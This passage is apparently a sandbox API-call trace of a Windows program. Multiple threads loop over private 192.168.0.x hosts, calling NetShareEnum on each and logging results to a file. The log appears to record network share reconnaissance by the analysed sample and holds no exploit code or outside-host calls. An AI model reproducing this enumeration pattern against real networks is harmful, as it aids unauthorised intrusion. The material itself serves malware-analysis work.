entriesread=0x451fed4, totalentries=0x451fed0, resume_handle=0x451fecc | out: bufptr=0x451fedc, entriesread=0x451fed4, totalentries=0x451fed0, resume_handle=0x451fecc) returned 0x35 [0258.065] SetEvent (hEvent=0x1dc) returned 1 [0258.065] RtlExitUserThread (Status=0x0) Thread: id = 49 os_tid = 0xc54 [0088.627] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.31", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.627] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.31", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.31", lpUsedDefaultChar=0x0) returned 14 [0088.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x465ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.627] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.627] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x465ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.627] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.627] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.627] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x465fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x465fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.683] NetShareEnum (in: servername="\\\\192.168.0.31", level=0x1, bufptr=0x465fedc, prefmaxlen=0xffffffff, entriesread=0x465fed4, totalentries=0x465fed0, resume_handle=0x465fecc | out: bufptr=0x465fedc, entriesread=0x465fed4, totalentries=0x465fed0, resume_handle=0x465fecc) returned 0x35 [0144.509] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.118", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.509] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.118", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.118", lpUsedDefaultChar=0x0) returned 15 [0144.509] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x465ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.509] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.509] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.509] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x465ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.509] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.509] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.509] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x465fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x465fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.516] NetShareEnum (in: servername="\\\\192.168.0.118", level=0x1, bufptr=0x465fedc, prefmaxlen=0xffffffff, entriesread=0x465fed4, totalentries=0x465fed0, resume_handle=0x465fecc | out: bufptr=0x465fedc, entriesread=0x465fed4, totalentries=0x465fed0, resume_handle=0x465fecc) returned 0x35 [0178.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.147", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.147", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.147", lpUsedDefaultChar=0x0) returned 15 [0178.177] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x465ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.177] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x465ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.177] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.177] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x465fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x465fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.181] NetShareEnum (in: servername="\\\\192.168.0.147", level=0x1, bufptr=0x465fedc, prefmaxlen=0xffffffff, entriesread=0x465fed4, totalentries=0x465fed0, resume_handle=0x465fecc | out: bufptr=0x465fedc, entriesread=0x465fed4, totalentries=0x465fed0, resume_handle=0x465fecc) returned 0x35 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.215", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.215", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.215", lpUsedDefaultChar=0x0) returned 15 [0211.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x465ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x465ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.192] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.192] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x465fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x465fc54*=0x44, lpOverlapped=0x0) returned 1 [0211.272] NetShareEnum (in: servername="\\\\192.168.0.215", level=0x1, bufptr=0x465fedc, prefmaxlen=0xffffffff, entriesread=0x465fed4, totalentries=0x465fed0, resume_handle=0x465fecc | out: bufptr=0x465fedc, entriesread=0x465fed4, totalentries=0x465fed0, resume_handle=0x465fecc) returned 0x35 [0258.031] SetEvent (hEvent=0x1dc) returned 1 [0258.031] RtlExitUserThread (Status=0x0) Thread: id = 50 os_tid = 0xc58 [0088.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.29", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.29", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.29", lpUsedDefaultChar=0x0) returned 14 [0088.576] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x479ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.576] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x479ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.577] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.577] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x479fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x479fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.618] NetShareEnum (in: servername="\\\\192.168.0.29", level=0x1, bufptr=0x479fedc, prefmaxlen=0xffffffff, entriesread=0x479fed4, totalentries=0x479fed0, resume_handle=0x479fecc | out: bufptr=0x479fedc, entriesread=0x479fed4, totalentries=0x479fed0, resume_handle=0x479fecc) returned 0x35 [0144.180] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.86", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.180] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.86", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.86", lpUsedDefaultChar=0x0) returned 14 [0144.180] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x479ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.180] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.180] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.180] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x479ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.180] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.180] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.180] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x479fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x479fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.189] NetShareEnum (in: servername="\\\\192.168.0.86", level=0x1, bufptr=0x479fedc, prefmaxlen=0xffffffff, entriesread=0x479fed4, totalentries=0x479fed0, resume_handle=0x479fecc | out: bufptr=0x479fedc, entriesread=0x479fed4, totalentries=0x479fed0, resume_handle=0x479fecc) returned 0x35 [0178.431] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.183", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.431] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.183", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.183", lpUsedDefaultChar=0x0) returned 15 [0178.431] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x479ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.431] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.431] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.431] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x479ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.431] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.432] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.432] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x479fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x479fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.436] NetShareEnum (in: servername="\\\\192.168.0.183", level=0x1, bufptr=0x479fedc, prefmaxlen=0xffffffff, entriesread=0x479fed4, totalentries=0x479fed0, resume_handle=0x479fecc | out: bufptr=0x479fedc, entriesread=0x479fed4, totalentries=0x479fed0, resume_handle=0x479fecc) returned 0x35 [0211.198] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.227", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.198] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.227", cchWideChar=15, lpMultiByteStr=0x1e8300c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.227", lpUsedDefaultChar=0x0) returned 15 [0211.198] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x479fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x479fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.295] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x479ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.295] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.295] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.295] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x479ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.295] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.295] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.295] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x479fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x479fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.296] NetShareEnum (in: servername="\\\\192.168.0.227", level=0x1, bufptr=0x479fedc, prefmaxlen=0xffffffff, entriesread=0x479fed4, totalentries=0x479fed0, resume_handle=0x479fecc | out: bufptr=0x479fedc, entriesread=0x479fed4, totalentries=0x479fed0, resume_handle=0x479fecc) returned 0x35 [0258.066] SetEvent (hEvent=0x1dc) returned 1 [0258.066] RtlExitUserThread (Status=0x0) Thread: id = 51 os_tid = 0xc60 [0088.619] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.30", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.619] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.30", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.30", lpUsedDefaultChar=0x0) returned 14 [0088.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x48dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.619] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.619] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x48dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.619] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.619] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.619] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x48dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x48dfc54*=0x10, lpOverlapped=0x0) returned 1 [0088.625] NetShareEnum (in: servername="\\\\192.168.0.30", level=0x1, bufptr=0x48dfedc, prefmaxlen=0xffffffff, entriesread=0x48dfed4, totalentries=0x48dfed0, resume_handle=0x48dfecc | out: bufptr=0x48dfedc, entriesread=0x48dfed4, totalentries=0x48dfed0, resume_handle=0x48dfecc) returned 0x35 [0144.227] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.90", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.227] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.90", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.90", lpUsedDefaultChar=0x0) returned 14 [0144.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x48dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.227] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.227] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.227] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x48dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.227] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.227] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 